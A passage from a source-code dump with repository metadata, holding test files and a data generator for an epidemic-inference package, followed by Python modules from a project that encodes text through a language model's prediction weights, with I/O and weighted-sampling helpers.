'test3'\n args.config_file = 'tests1.yml'\n args.verbose = True\n driver.run(args)\n\n compare_json('test1_output1.json', 'test1_baseline1.json')\n os.remove('test1_output1.json')\n\n compare_json('test1_output2.json', 'test1_baseline2.json')\n os.remove('test1_output2.json')\n\n compare_json('test2_output1.json', 'test2_baseline1.json')\n os.remove('test2_output1.json')\n\n def test_test4(self):\n args = Options()\n args.block = 'test4'\n args.config_file = 'tests1.yml'\n args.verbose = True\n driver.run(args)\n\n compare_json('test1_output1.json', 'test1_baseline1.json')\n os.remove('test1_output1.json')\n\n compare_json('test1_output2.json', 'test1_baseline2.json')\n os.remove('test1_output2.json')\n\n compare_json('test2_output1.json', 'test2_baseline1.json')\n os.remove('test2_output1.json')\n\n def test_test5(self):\n args = Options()\n args.block = 'test5'\n args.config_file = 'tests1.yml'\n args.verbose = True\n driver.run(args)\n\n compare_json('test1_output1.json', 'test1_baseline1.json')\n os.remove('test1_output1.json')\n\n compare_json('test1_output2.json', 'test1_baseline2.json')\n os.remove('test1_output2.json')\n\n compare_json('test2_output1.json', 'test2_baseline1.json')\n os.remove('test2_output1.json')\n\n def test_test6(self):\n args = Options()\n args.block = 'test6'\n args.config_file = 'tests2.yml'\n args.verbose = True\n driver.run(args)\n\n compare_json('test6_output1.json', 'test6_baseline1.json')\n os.remove('test6_output1.json')\n\n compare_json('test6_output2.json', 'test6_baseline2.json')\n os.remove('test6_output2.json')\n\n def test_test7(self):\n args = Options()\n args.block = 'test7'\n args.config_file = 'tests3.yml'\n args.verbose = True\n driver.run(args)\n\n compare_json('test7_output1.json', 'test7_baseline1.json')\n os.remove('test7_output1.json')\n\n def test_test8(self):\n args = Options()\n args.block = 'test8'\n args.config_file = 'tests4.yml'\n args.verbose = True\n driver.run(args)\n\n compare_json('test8_output1.json', 'test8_baseline1.json')\n os.remove('test8_output1.json')\n\n" }, { "alpha_fraction": 0.5690353512763977, "alphanum_fraction": 0.6108247637748718, "avg_line_length": 43.162601470947266, "blob_id": "e9489673080f14168e50dbe9d124a4ef8a2e9f65", "content_id": "10807ef57c38d3c6d9b883e341c7213b75ab8a47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5432, "license_type": "no_license", "max_line_length": 116, "num_lines": 123, "path": "/epi_inference/ATTIC/tests/bad_end_to_end.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pytest\nimport subprocess\nimport os\nimport os.path\nimport json\nimport pandas as pd\nimport numpy as np\n\nfrom pyomo.common import fileutils as fileutils\n\ndef _cleanup_output(files):\n for f in files:\n if os.path.isfile(f):\n os.remove(f)\n\nclass TestEndToEnd():\n\n @classmethod\n def setup_class(cls):\n cls._origdir = os.getcwd()\n thisfiledir = fileutils.this_file_dir()\n os.chdir(thisfiledir)\n\n @classmethod\n def teardown_class(cls):\n os.chdir(cls._origdir)\n\n def test_inference_simulated_county_different_beta(self):\n # list of expected output files for cleanup\n expected_output_files = ['./output/results_inference_simulated_county_different_beta.csv',\n './output/results_inference_simulated_county_different_beta_meta.yml']\n\n # cleanup any output that may be lingering from old runs\n _cleanup_output(expected_output_files)\n\n # execute epiinf\n cmd = ['epiinf', 'inference', 
'./config_files/inference_simulated_county_different_beta.yml']\n subprocess.run(cmd)\n\n # read the output that was produced\n assert os.path.isfile('./output/results_inference_simulated_county_different_beta.csv')\n df = pd.read_csv('./output/results_inference_simulated_county_different_beta.csv', dtype={\"FIPS\":'str'})\n\n # expected output\n expected_df = {\"est_beta\": [0.25, 0.5, 0.75, 1.0, 1.25, 1.5],\n \"status\": ['ok' for i in range(6)],\n \"population\": [1000000]*6,\n \"total_cases\": [2.579078, 6.097038, 12.661745, 23.655522, 40.762154, 65.994705],\n \"FIPS\": ['025', '050', '075', '100', '125', '150']}\n expected_df = pd.DataFrame.from_dict(expected_df)\n\n # compare the estimated beta values\n pd.testing.assert_series_equal(left=df['est_beta'], right=expected_df['est_beta'], check_exact=False)\n pd.testing.assert_series_equal(left=df['total_cases'], right=expected_df['total_cases'], check_exact=False)\n pd.testing.assert_series_equal(left=df['status'], right=expected_df['status'], check_exact=False)\n\n # cleanup the output \n _cleanup_output(expected_output_files)\n\n def test_inference_simulated_county_different_beta_int(self):\n # list of expected output files for cleanup\n expected_output_files = ['./output/results_inference_simulated_county_different_beta_int.csv',\n './output/results_inference_simulated_county_different_beta_int_meta.yml']\n\n # cleanup any output that may be lingering from old runs\n _cleanup_output(expected_output_files)\n\n # execute epiinf\n cmd = ['epiinf', 'inference', './config_files/inference_simulated_county_different_beta_int.yml']\n subprocess.run(cmd)\n\n # read the output that was produced\n assert os.path.isfile('./output/results_inference_simulated_county_different_beta_int.csv')\n df = pd.read_csv('./output/results_inference_simulated_county_different_beta_int.csv', dtype={\"FIPS\":'str'})\n\n # expected output\n expected_df = {\"est_beta\": [0.256255, 0.507560, 0.802103, 1.015384, 1.271785, 1.480856],\n \"status\": ['ok' for i in range(6)],\n \"population\": [1000000]*6,\n \"total_cases\": [3.0, 6.0, 13.0, 24.0, 41.0, 66.0],\n \"FIPS\": ['025', '050', '075', '100', '125', '150']}\n expected_df = pd.DataFrame.from_dict(expected_df)\n\n # compare the produced output with the expected output\n pd.testing.assert_series_equal(left=df['est_beta'], right=expected_df['est_beta'], check_exact=False)\n pd.testing.assert_series_equal(left=df['total_cases'], right=expected_df['total_cases'], check_exact=False)\n pd.testing.assert_series_equal(left=df['status'], right=expected_df['status'], check_exact=False)\n\n # cleanup the output \n _cleanup_output(expected_output_files)\n\n def test_inference_florida_mobility(self):\n # list of expected output files for cleanup\n expected_output_files = ['./output/florida_inference_mobility_2.json',\n './output/florida_inference_mobility_2_meta.yml']\n\n # cleanup any output that may be lingering from old runs\n _cleanup_output(expected_output_files)\n\n # execute epiinf\n cmd = ['epiinf', 'inference', './config_files/florida_inference_mobility.yml']\n subprocess.run(cmd)\n\n # check that the output files were produced\n for f in expected_output_files:\n assert os.path.isfile(f)\n\n # read the json output\n with open('./output/florida_inference_mobility_2.json', 'r') as fd:\n data = json.load(fd)\n\n # loop over each run (different R0)\n expected_avg_beta = [1.36/4, 1.51/4, 1.81/4, 2.02/4, 2.17/4, 2.37/4, 2.55/4, 2.70/4]\n betas_by_r0 = [list()]*len(expected_avg_beta)\n for r, rd in enumerate(data):\n r0 = 
float(rd['R0'])\n for d in rd['results']:\n if d['total_cases'] > 20:\n betas_by_r0[r].append(d['est_beta'])\n avg_beta = sum(betas_by_r0[r])/len(betas_by_r0[r])\n print(avg_beta*4, r0)\n assert abs(expected_avg_beta[r] - avg_beta) <= 0.01*expected_avg_beta[r]\n assert abs(float(r0)-avg_beta*4) <= 0.1*r0\n" }, { "alpha_fraction": 0.5442670583724976, "alphanum_fraction": 0.569908082485199, "avg_line_length": 39.411766052246094, "blob_id": "d07d641be6b38da0b49aee1c549e62cafba33054", "content_id": "9a37214ac265d1617275e8d3578f1d374749cdca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2067, "license_type": "no_license", "max_line_length": 136, "num_lines": 51, "path": "/epi_inference/ATTIC/tests/data/generate_data_files.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pytest\nimport numpy as np\nimport pandas as pd\nimport csv\nfrom epi_inference.formulations.simulation import simulate_discrete_seiiir_deterministic\nfrom epi_inference.util import roundall\nfrom epi_inference.formulations.decay_lsq import run_decay_lsq\nfrom epi_inference.formulations.decay_blike import run_decay_blike\nfrom epi_inference.formulations.multinode_decay_lsq import run_multinode_decay_lsq\nimport matplotlib.pyplot as plt\n\ndef generate_datafile():\n \"\"\"\n Test the decay inference using data from a simulation with the seiiir deterministic model\n \"\"\"\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho = 1\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n\n dfdict = dict()\n dfpop = dict({'FIPS':[],'pop':[]})\n for beta in [0.25, 0.5, 0.75, 1.0, 1.25, 1.5]:\n Cdates,C,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n if len(dfdict) == 0:\n dfdict['Date'] = Cdates\n FIPSstr = '{:03d}'.format(int(100*beta))\n dfdict[FIPSstr] = C\n dfpop['FIPS'].append(FIPSstr)\n dfpop['pop'].append(N)\n\n dfC = pd.DataFrame(dfdict)\n dfC.to_csv('simulated_independent_county_different_beta.csv', index=False, quoting=csv.QUOTE_NONNUMERIC, date_format=\"%Y-%m-%d\")\n\n dfC = dfC.round()\n dfC.to_csv('simulated_independent_county_different_beta_int.csv', index=False, quoting=csv.QUOTE_NONNUMERIC, date_format=\"%Y-%m-%d\")\n\n dfP = pd.DataFrame(dfpop)\n dfP.to_csv('simulated_independent_county_different_beta_pop.csv', index=False, quoting=csv.QUOTE_NONNUMERIC)\n\nif __name__ == '__main__':\n generate_datafile()\n \n\n" }, { "alpha_fraction": 0.6298971772193909, "alphanum_fraction": 0.6985637545585632, "avg_line_length": 65.47457885742188, "blob_id": "9971c25f9e90b5fe915eb2285bd45a8afe5562a0", "content_id": "bef38e499d260e542fd34deee12bc9021c4383a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11767, "license_type": "no_license", "max_line_length": 82, "num_lines": 177, "path": "/epi_inference/workflow/tests/test_inference_json2csv_by_county.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pytest\nimport os\nimport os.path\nimport json\nimport yaml\nimport numpy as np\nimport pandas as pd\n\nfrom pyomo.common import fileutils as fileutils\nfrom pyutilib.misc import Options as Options\n\nfrom epi_inference.engine import driver\nfrom epi_inference.util import compare_json, compare_csv\n\nclass Test_Inference_JSON2CSV_By_County():\n @classmethod\n def 
setup_class(cls):\n # change to the test directory\n cls._origdir = os.getcwd()\n thisfiledir = fileutils.this_file_dir()\n rundir = os.path.join(thisfiledir, 'inference_json2csv_by_county')\n os.chdir(rundir)\n\n @classmethod\n def teardown_class(cls):\n # return to the previous directory\n os.chdir(cls._origdir)\n\n def test_inference_json2csv_by_county(self):\n args = Options()\n args.block = 'all'\n args.config_file = './workflows/inference_json2csv_by_county.yml'\n args.verbose = True\n driver.run(args)\n\n for f in csv_files():\n output_file = os.path.join('results', f)\n baseline_file = os.path.join('baseline', f) \n compare_csv(output_file, baseline_file)\n\ndef csv_files():\n ret = ['inference_json2csv_by_county/estimated_beta_county_12001.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12003.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12005.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12007.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12009.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12011.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12013.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12015.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12017.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12019.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12021.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12023.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12027.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12029.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12031.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12033.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12035.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12037.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12039.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12041.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12043.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12045.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12047.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12049.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12051.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12053.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12055.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12057.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12059.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12061.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12063.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12065.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12067.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12069.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12071.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12073.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12075.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12077.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12079.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12081.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12083.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12085.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12086.csv',\n 
'inference_json2csv_by_county/estimated_beta_county_12087.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12089.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12091.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12093.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12095.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12097.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12099.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12101.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12103.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12105.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12107.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12109.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12111.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12113.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12115.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12117.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12119.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12121.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12123.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12125.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12127.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12129.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12131.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12133.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12001.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12003.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12005.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12007.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12009.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12011.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12013.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12015.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12017.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12019.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12021.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12023.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12027.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12029.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12031.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12033.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12035.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12037.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12039.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12041.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12043.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12045.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12047.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12049.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12051.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12053.csv',\n 
'inference_json2csv_by_county/summary_estimated_beta_county_12055.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12057.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12059.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12061.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12063.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12065.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12067.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12069.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12071.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12073.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12075.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12077.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12079.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12081.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12083.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12085.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12086.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12087.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12089.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12091.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12093.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12095.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12097.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12099.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12101.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12103.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12105.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12107.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12109.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12111.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12113.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12115.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12117.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12119.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12121.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12123.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12125.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12127.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12129.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12131.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12133.csv']\n\n return ret\n\n" } ]
83
stevekrenzel/modeled_encryption
https://github.com/stevekrenzel/modeled_encryption
c8e7749e00de04e5898f7eeac970c5dda8b2ef46
6740d0bebbbf42fa04528e885629e6726ec823da
7691706fce5480ff6cadcf89039d31dec758ab10
refs/heads/master
2021-04-29T11:26:53.779980
2017-01-04T07:41:01
2017-01-04T07:41:01
77,819,639
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6616825461387634, "alphanum_fraction": 0.668328046798706, "avg_line_length": 35.78333282470703, "blob_id": "6883a00058a74a579cff8b5bfd997ee409017488", "content_id": "5ec6a71be8be79863b54f11de77fd591e8097a29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6621, "license_type": "no_license", "max_line_length": 79, "num_lines": 180, "path": "/src/encoding.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "from util.packing import unpack_ints, pack_ints\nfrom util.randoms import random_ints\nfrom util.lists import take, to_generator\nfrom util.modeling import tabulate, recite\nfrom util.padding import pad, unpad\n\ndef encode(model, text, block_size=16):\n \"\"\"Encodes a list of values into a list of approximately uniformly random\n weights as determined by the model's predictions for each value in\n `values`.\n\n The higher the model's prediction accuracy, the more uniformly random the\n output weights will be.\n\n The length of the encoded bytes will be a multiple of `block_size`.\n\n Example:\n >> decode(model, encode(model, \"foobar\", 16))\n \"FOOBAR \"\n\n Args:\n model (Model): The model to use for encoding. This should be trained on\n a domain related to `text`.\n\n text (string): The text to encode.\n\n block_size (int, optional): The output will be padded to be a multiple\n of `block_size`.\n\n Returns (bytes):\n A byte array containing the weights used to encode the text.\n\n Raises:\n ValueError: If `text` contains an item that isn't in the `model`'s\n alphabet.\n\n Exception: If padding the encoded plaintext fails. This is a\n non-deterministic process. The probability of this happening is\n highly unlikely, but not impossible. 
If your model has a boundary\n that occurs with a low-probability and you're getting this\n exception, increase your model's max_padding_trials attribute.\n \"\"\"\n randoms = random_ints() # Infinite stream of random ints\n (initial_weights, initial_sequence) = _initialize(model, randoms)\n\n transformed = list(model.transform(text))\n padded = pad(model, initial_sequence, transformed, block_size)\n encoded = tabulate(model, initial_sequence, padded)\n return pack_ints(initial_weights + list(encoded))\n\ndef decode(model, data):\n \"\"\"Decodes a byte array of weights into a string that is generated by\n using these weights to choose characters from a model's probability\n distribution.\n\n Example:\n >> decode(model, encode(model, \"foobar\", 16))\n \"FOOBAR \"\n\n Args:\n model (Model): The model that was used when encoding the provided data.\n\n data (bytes): The data containing the encoded weights to be used for\n decoding.\n\n Returns (string):\n The decoded string.\n \"\"\"\n randoms = to_generator(unpack_ints(data))\n (_, initial_sequence) = _initialize(model, randoms)\n\n decoded = recite(model, initial_sequence, randoms)\n unpadded = unpad(model, list(decoded))\n return ''.join(unpadded)\n\ndef _initialize(model, randoms):\n \"\"\"Given a model, returns the initial sequence to use for encoding, along\n with the weights that were used to generate that sequence.\n\n This initial sequence is generated after 1) normalizing the model and 2)\n priming the sequence.\n\n What does normalizing do?\n -------------------------\n\n The initial (seed) sequence in the model is entirely random\n (see: `_seed_sequence`), which results in the first few predictions of the\n model having a skewed disitribution that isn't representative of the\n underlying domain.\n\n What does priming do?\n ---------------------\n\n We want the initial sequence to be unique and representative of the\n underlying domain. We also want to start encoding after a boundary\n character. Priming generates a sequence and then chops off the suffix until\n a boundary is hit. 
This ensures that we don't start encoding with an\n initial sequence that end in the middle of a token.\n\n That is, if our priming step resulted in:\n\n \"ATTACK THE EASTERN FRO\"\n\n We'd return:\n\n \"ATTACK THE EASTERN \"\n\n If we didn't end on a boundary, as in the first example, then the model's\n predictions will be *really* skewed for the first few characters we encode.\n\n Example:\n >> from random import randint\n >> sequence_length = model.config.model.sequence_length\n >> normalizing_length = model.config.encoding.normalizing_length\n >> priming_length = model.config.encoding.priming_length\n >> length = sequence_length + normalizing_length + priming_length\n >> randoms = [randint(0, 2**32 - 1) for _ in range(length)]\n >>\n >> (weights, sequence) = _initialize(model, to_generator(randoms))\n >>\n >> \"\".join(sequence)\n 'ESPONSIBLE FOR PROVIDING THE READINESS ACTIVITIES '\n >> weights == list(randoms)\n True\n\n Args:\n model (Model): The model to use for generating the initial sequence.\n\n randoms (generator<int>): A generator that returns a sequence of\n 32-bit integers.\n\n Returns ((list(ints), list(char))):\n A tuple containing the list of weights used to generate the sequence,\n and the sequence itself.\n \"\"\"\n sequence_length = model.config.model.sequence_length\n normalizing_length = model.config.encoding.normalizing_length\n priming_length = model.config.encoding.priming_length\n\n seed = take(sequence_length, randoms)\n normals = take(normalizing_length, randoms)\n priming = take(priming_length, randoms)\n\n start = _seed_sequence(model, seed)\n primed = list(recite(model, start, normals + priming))\n unpadded = unpad(model, primed) # Removes any partial tokens at end\n return (seed + normals + priming, start + unpadded[-sequence_length:])\n\ndef _seed_sequence(model, seed):\n \"\"\"Generates a uniformly random sequence drawn from the model's alphabet.\n\n Note: If the length of the model's alphabet is not a power of 2 then there\n will be a small and neglible amount of skew towards earlier characters in\n the alphabet.\n\n This skew is bounded by:\n 1 + (1 / floor(2^32 / alphabet_length))\n\n That results in a maximum skew of 1.0000002 for a model with an alphabet\n of 1,000 or fewer characters.\n\n The randomness of this seed is not critical for security. 
That is, this\n function could return a fixed seed without impacting the security of the\n system.\n\n Example:\n >> from random import randint\n >> _seed_sequence(model, (randint(0, 2**32 - 1) for _ in range(10))\n ['R', 'U', 'B', 'S', 'T', 'K', '7', 'P', '5', 'A']\n\n Args:\n model (Model): The model that you're generating a seed for.\n\n seed (list(int)): The random 32-bit integers to use to generate the\n sequence.\n\n \"\"\"\n alphabet = model.config.model.alphabet\n alphabet_size = len(alphabet)\n return [alphabet[r % alphabet_size] for r in seed]\n" }, { "alpha_fraction": 0.6363636255264282, "alphanum_fraction": 0.6413043737411499, "avg_line_length": 25.63157844543457, "blob_id": "d61f404c69a3a02a186b997d4ac55565400e39e8", "content_id": "b663c07b21e457f059be35472083865522edaa7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1012, "license_type": "no_license", "max_line_length": 80, "num_lines": 38, "path": "/src/util/io.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "from sys import stdout, stdin\nfrom getpass import getpass\n\ndef confirmed_get_pass(message, confirmation_message):\n \"\"\"Securely gets input from the console twice and confirms that they match.\n\n Args:\n message (string): The message to show to the user for the first request.\n\n confirmation_message (string:The message to show to the user for the\n second request.\n\n Returns:\n None if the inputs don't match, otherwise returns the input.\n \"\"\"\n input1 = getpass(message)\n input2 = getpass(confirmation_message)\n\n if input1 != input2:\n return None\n\n return input1\n\ndef read_file(filename):\n \"\"\"Reads the contents of a file. If the filename is None or '-', defaults\n to stdin.\n\n Args:\n filename (string): The filename to read.\n\n Returns:\n The contents of the file or stdin.\n \"\"\"\n if filename == '-' or filename == None:\n return stdin.read()\n else:\n with open(filename) as fin:\n return fin.read()\n" }, { "alpha_fraction": 0.5747508406639099, "alphanum_fraction": 0.5853820443153381, "avg_line_length": 30.795774459838867, "blob_id": "f139bd6277dd63feef61f5a7ea1ddcc4384f3f8d", "content_id": "85ad9b5a079a1f77b1fcfec10ec67ac8162bb8d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4515, "license_type": "no_license", "max_line_length": 89, "num_lines": 142, "path": "/src/util/sampling.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "from random import SystemRandom\n\nRAND = SystemRandom()\n\ndef choose_choice(weight, choices, weights):\n \"\"\"This is just like a normal random weighted sample, but we provide the\n chosen weight instead of it being randomly generated.\n\n Given a list of items and associated weights, this returns the item\n associated with the provided `weight`.\n\n The weights are integer weights. Associating a weight of `N` with an item\n is equivalent to repeating it's corresponding item `N` times in a uniform\n sample. 
That is, given choices [\"A\", \"B\"] and weights [2, 3], this is\n equivalent to uniformly sampling [\"A\", \"A\", \"B\", \"B\", \"B\"] (but more memory\n efficient).\n\n Examples:\n >> choose_choice(0, [\"A\", \"B\", \"C\"], [1, 2, 3])\n \"A\"\n\n >> choose_choice(1, [\"A\", \"B\", \"C\"], [1, 2, 3])\n \"B\"\n\n >> choose_choice(2, [\"A\", \"B\", \"C\"], [1, 2, 3])\n \"B\"\n\n >> choose_choice(3, [\"A\", \"B\", \"C\"], [1, 2, 3])\n \"C\"\n\n >> choose_choice(4, [\"A\", \"B\", \"C\"], [1, 2, 3])\n \"C\"\n\n >> choose_choice(5, [\"A\", \"B\", \"C\"], [1, 2, 3])\n \"C\"\n\n Args:\n weight (int): A number >= 0 and < sum(weights). This is used\n to determine which element in the `choices` list to select.\n\n choices (list(x)): The list of items to choose from.\n\n weights (list(int)): The integer weights associated with each\n item in `choices`.\n\n Returns:\n The choice corresponding to the provided weight.\n\n Raises:\n ValueError: If `choices` and `weights` have different lengths.\n\n ValueError: If `weight` is less than zero or greater than sum(weights).\n \"\"\"\n if len(weights) != len(choices):\n raise ValueError(\"Weights has length %s, but choices has length %s.\"\n % (len(weights), len(choices)))\n\n if len(choices) == 0:\n raise ValueError(\"Can't have zero choices.\")\n\n if weight < 0:\n raise ValueError(\"Weight, %s, can not be less than zero.\" % (weight))\n\n total = 0\n for c, w in zip(choices, weights):\n total = total + w\n if weight < total:\n return c\n\n raise ValueError(\"Weight, %s, must be less than %s, the sum of all weights.\"\n % (weight, total))\n\ndef choose_weight(choice, choices, weights):\n \"\"\"This is the opposite of choose_choice. Given a choice, this generates a\n random weight corresponding to the provided choice. That is, choose_choice\n returns a choice given a weight, whereas choose_weight returns a weight for\n a provided choice.\n\n Each item in `choices` has a range of weights that corresponds to it. 
